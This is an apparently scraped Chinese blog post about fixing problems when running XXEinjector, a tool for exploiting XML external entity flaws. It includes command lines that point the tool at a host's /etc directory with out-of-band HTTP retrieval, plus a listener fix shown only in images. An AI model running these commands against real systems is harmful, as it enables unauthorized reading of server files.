XXEInjector使用中遇到的问题

https://github.com/enjoiz/XXEinjector
直接下载之后,在安装了Ruby的环境里可以直接使用,以下是我在使用过程中遇到的问题:
1、端口冲突

XXEInjector使用中遇到的问题_第1张图片
1.png

ruby XXEinjector.rb --host=10.70.73.99 --path=/etc --file=d:/tmp/req.txt --oob=http
不指定端口,XXEinjector默认80,而我电脑上已经占用了80口,因此导致了冲突。
解决方法,指定一个未占用的端口,例如:8800
ruby XXEinjector.rb --host=192.168.106.99 --httpport=8800 --path=/etc --file=d:/tmp/req.txt --oob=http

2、无法接收到FTP/HTTP的响应


XXEInjector使用中遇到的问题_第2张图片
2.png

这个现象很奇怪,在TcpView里面看到,对应的端口已经打开了,


3.png

但是telnet连也无法连通:


4.png

通过查Ruby建立Tcp连接的资料得知,通过正常的写法,同时指定了IP和端口,就可以连。
于是,修改XXEInjector的代码,将其中建立HTTP监听的部分,加入指定IP的代码,这样就可以解决问题了。


XXEInjector使用中遇到的问题_第3张图片
5.png

XXEInjector使用中遇到的问题_第4张图片
6.png

你可能感兴趣的:(XXEInjector使用中遇到的问题)